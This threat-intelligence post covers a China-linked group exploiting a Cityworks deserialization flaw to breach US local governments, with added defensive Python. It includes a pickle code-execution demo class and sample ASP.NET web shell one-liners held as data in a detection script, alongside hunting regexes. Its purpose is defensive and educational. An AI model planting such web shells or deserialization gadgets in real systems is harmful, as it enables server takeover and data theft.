May 23, 2025

China-linked threat actor breaches government networks with Trimble flaw

The Chinese-speaking cyber-espionage group tracked as UAT-6382 has been observed exploiting a critical vulnerability in Trimble's Cityworks asset-management software to gain access to U.S. government networks.

The flaw, CVE-2025-0944, is a deserialization-of-untrusted-data vulnerability (CWE-502) in Cityworks that allows remote code execution on the Microsoft IIS web server hosting the application. Trimble has since patched it, but the group has been exploiting it since at least January 2025 against the enterprise networks of local governments in the United States.
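To make the bug class concrete, here is an added example that is not Cityworks code (Cityworks is a .NET application; Python's pickle is used so the example runs anywhere). It shows why deserializing attacker-controlled bytes is code execution, then two safer patterns: an allow-list unpickler and, preferably, a data-only format with explicit validation. The `WorkOrder` type, the status values, the `OrderedDict` allow-list entry and the `echo` command are constructed for the illustration.

```python
"""Deserialization of untrusted data (CWE-502), the bug class behind
CVE-2025-0944, demonstrated with Python's pickle.  Added example; this is
not Cityworks code, only the same class of bug."""
import collections
import importlib
import io
import json
import pickle
import subprocess


class Exploit:
    """Attacker-crafted object.  pickle serialises whatever __reduce__ returns
    as 'call this function with these arguments', and the loader obeys."""

    def __reduce__(self):
        # Constructed, harmless stand-in for an attacker's command.
        return (subprocess.check_output, (["echo", "code ran during deserialization"],))


MALICIOUS_PAYLOAD = pickle.dumps(Exploit())        # what an attacker would send
BENIGN_PAYLOAD = pickle.dumps(collections.OrderedDict(order_id=7, status="open"))


def vulnerable_load(data: bytes):
    """The flaw: pickle.loads runs the embedded callable before any
    application code gets to inspect the result."""
    return pickle.loads(data)


# Mitigation 1: allow-list the exact globals the application expects.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}   # assumption for the demo


class RestrictedUnpickler(pickle.Unpickler):
    """Every class or function reference in the stream goes through
    find_class, so this is the one place to refuse anything not listed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(importlib.import_module(module), name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def loads_safely(data: bytes):
    """Return the object, or None if the restricted loader rejected it."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return None


# Mitigation 2 (preferred): a data-only format plus explicit validation.
class WorkOrder:
    def __init__(self, order_id: int, status: str):
        self.order_id = order_id
        self.status = status


ALLOWED_STATUS = {"open", "closed"}   # constructed vocabulary


def load_work_order_json(text: str) -> WorkOrder:
    """JSON cannot name a class or function, so nothing executes on parse;
    the remaining job is to check shape and values."""
    obj = json.loads(text)
    if not isinstance(obj, dict) or set(obj) != {"order_id", "status"}:
        raise ValueError("unexpected fields")
    if isinstance(obj["order_id"], bool) or not isinstance(obj["order_id"], int):
        raise ValueError("order_id must be an integer")
    if obj["status"] not in ALLOWED_STATUS:
        raise ValueError("unknown status")
    return WorkOrder(obj["order_id"], obj["status"])


if __name__ == "__main__":
    print(vulnerable_load(MALICIOUS_PAYLOAD))   # the attacker's command output
    print(loads_safely(MALICIOUS_PAYLOAD))      # None: rejected
    print(loads_safely(BENIGN_PAYLOAD))         # the OrderedDict
```

The allow-list is a containment measure, not a cure: any listed class with a rich `__setstate__` or `__reduce__` can still be a gadget, which is why the second pattern, a format that cannot carry code at all, is the one to reach for when the data crosses a trust boundary.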

Upon gaining access, UAT-6382 conducted reconnaissance to identify and fingerprint servers, then deployed various web shells and custom-made malware to maintain long-term access. Notably, they delivered a Rust-based loader known as TetraLoader, which launched Cobalt Strike and a Go-based remote access tool named VShell. TetraLoader was built using MaLoader, a publicly available malware-building framework written in Simplified Chinese that first appeared on GitHub in December 2024.

UAT-6382 also used the AntSword, Chopper and Behinder web shells, all commonly associated with Chinese hacking groups, to run commands on the compromised servers. The actors enumerated directories on those servers to identify files of interest and staged them in the directories where the web shells lived so they could be retrieved over the same HTTP channel. Additional backdoors were downloaded and deployed via PowerShell to ensure persistent access.
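A hunt for the web shell activity described above, written as an added example rather than Field Effect's or any vendor's tooling. It flags IIS log entries that look like web shell traffic and scans a webroot for one-liner ASP.NET shells. The log lines and file contents are constructed; the web shell User-Agent fragment, the list of directories that should only hold static content, and the content signatures are assumptions drawn from common Chopper/AntSword-style one-liners and Behinder-style reflective loaders, not from the page.

```python
"""Hunt for web shell deployment and use on an IIS host: flag suspicious
requests in W3C logs and scan the webroot for one-liner ASP.NET shells.
Added example; all sample data is constructed."""
import re
from collections import defaultdict
from pathlib import Path

# Constructed IIS W3C log.  IIS replaces spaces in the User-Agent with '+',
# which is why a plain whitespace split is enough here.
SAMPLE_IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status
2025-01-14 03:12:07 GET /Cityworks/Login.aspx 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) 200
2025-01-14 03:12:41 POST /Cityworks/Login.aspx 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0) 302
2025-01-14 03:15:02 POST /Cityworks/images/config.aspx 203.0.113.10 antSword/v2.1 200
2025-01-14 03:15:09 POST /Cityworks/images/config.aspx 203.0.113.10 antSword/v2.1 200
2025-01-14 03:20:33 POST /Cityworks/App_Data/temp/t.ashx 198.51.100.7 Mozilla/5.0 200
2025-01-14 03:21:10 POST /Cityworks/App_Data/temp/t.ashx 198.51.100.7 Mozilla/5.0 200
"""

SCRIPT_EXT = (".aspx", ".ashx", ".asmx")
# Assumption: User-Agent fragments sent by common web shell clients.
SHELL_USER_AGENTS = ("antSword/",)
# Assumption: directories under the webroot that should never serve scripts.
STATIC_DIRS = ("/images/", "/uploads/", "/temp/", "/app_data/")

# Assumption: content signatures for Chopper/AntSword-style one-liners and
# for the reflective assembly loading used by Behinder-style shells.
SHELL_SIGNATURES = {
    "chopper_eval": re.compile(r"eval\s*\(\s*Request\.Item\s*\[", re.I),
    "unsafe_eval": re.compile(r'eval\s*\(.*,\s*"unsafe"\s*\)', re.I),
    "reflective_load": re.compile(r"Assembly\.Load\s*\(", re.I),
}

# Constructed webroot contents keyed by path relative to the webroot.
SAMPLE_FILES = {
    "Login.aspx": '<%@ Page Language="C#" Inherits="Cityworks.Login" %>',
    "images/config.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "App_Data/temp/t.ashx": '<%@ WebHandler Language="C#" Class="h" %> '
    'System.Reflection.Assembly.Load(Convert.FromBase64String(ctx.Request["d"]))',
}


def parse_iis(text):
    """Turn a W3C log into a list of dicts using its #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def hunt_iis(rows):
    """Return sorted (rule, uri, client_ip) findings."""
    methods = defaultdict(set)
    for r in rows:
        methods[r["cs-uri-stem"]].add(r["cs-method"])
    findings = set()
    for r in rows:
        uri, ip, ua = r["cs-uri-stem"], r["c-ip"], r["cs(User-Agent)"]
        low = uri.lower()
        if any(s in ua for s in SHELL_USER_AGENTS):
            findings.add(("shell_user_agent", uri, ip))
        if low.endswith(SCRIPT_EXT):
            if any(d in low for d in STATIC_DIRS):
                findings.add(("script_in_static_dir", uri, ip))
            # Real pages are fetched with GET at least once; a script that
            # only ever sees POSTs is being driven by a tool, not a browser.
            if methods[uri] == {"POST"}:
                findings.add(("post_only_endpoint", uri, ip))
    return sorted(findings)


def scan_sources(files):
    """Return sorted (signature, path) hits over {relative_path: content}."""
    return sorted((name, path) for path, body in files.items()
                  for name, rx in SHELL_SIGNATURES.items() if rx.search(body))


def scan_webroot(root):
    """Same scan over a real directory tree, e.g. scan_webroot('C:/inetpub/wwwroot')."""
    root = Path(root)
    files = {str(p.relative_to(root)): p.read_text(errors="ignore")
             for p in root.rglob("*") if p.suffix.lower() in SCRIPT_EXT}
    return scan_sources(files)


if __name__ == "__main__":
    for f in hunt_iis(parse_iis(SAMPLE_IIS_LOG)):
        print("log ", *f)
    for f in scan_sources(SAMPLE_FILES):
        print("file", *f)
```

The "POST-only endpoint" rule is the most durable of the three: a shell client never renders the page, so a script that receives POSTs but no GETs stands out even when the operator has changed the default User-Agent and encrypted the request body, as Behinder does. Run `scan_webroot` against the live IIS content directory and compare the hit list with the file modification times around the suspected exploitation window.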

In light of UAT-6382’s exploitation of CVE-2025-0944, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in February 2025.

Source: Bleeping Computer

Analysis

Trimble Cityworks is an asset management platform widely used by municipalities, utilities, and public works agencies to manage infrastructure assets throughout their lifecycle. The platform provides tools for work order management, permitting, inspections, and maintenance operations, facilitating data-driven decision-making and efficient service delivery.

China has a history of targeting local governing bodies in the United States, particularly as part of broader cyber-espionage campaigns aimed at gathering strategic intelligence.

One notable example occurred in 2021, when Chinese state-sponsored hackers were linked to a campaign exploiting vulnerabilities in Microsoft Exchange Server. That operation, attributed to a group known as HAFNIUM, impacted a wide range of organizations, including municipal governments. The attackers chained then-zero-day flaws (the ProxyLogon vulnerabilities) to gain access to email systems, exfiltrate sensitive data, and establish persistent access through web shells, the same post-exploitation pattern seen here.

Another example is the ongoing trend observed by U.S. federal agencies, where Chinese-linked threat actors have been found targeting state and local government systems as part of influence or surveillance operations. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has repeatedly warned that such groups seek to exploit vulnerabilities in smaller government entities, which often have fewer cybersecurity resources but maintain valuable data and infrastructure access.

These activities are consistent with China’s strategic goals of building a comprehensive intelligence picture across all levels of governance—not just federal agencies. By targeting local bodies, Chinese threat actors can collect data related to public infrastructure, law enforcement, political activities, and citizen demographics, all of which may support espionage, influence, or disruption operations.

This incident underscores the importance of promptly applying security patches and monitoring for signs of compromise, especially in software platforms integral to critical infrastructure management.

Mitigation

Field Effect’s Security Intelligence professionals constantly monitor the cyber threat landscape for emerging threats emanating from China-linked actors like UAT-6382. Field Effect MDR users are automatically notified if activity associated with these groups is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect Portal.

Field Effect strongly encourages users of the impacted Trimble Cityworks versions to update to a fixed release (Cityworks 15.8.9 or later, or Cityworks with Office Companion 23.10 or later) as soon as possible. Patching closes the entry point but does not remove anything an attacker has already left behind: on any server that ran a vulnerable version, review the IIS web directories for unexpected .aspx or .ashx files, check PowerShell logs for download activity, and look for unrecognised binaries or services that could be the Cobalt Strike or VShell implants described above.
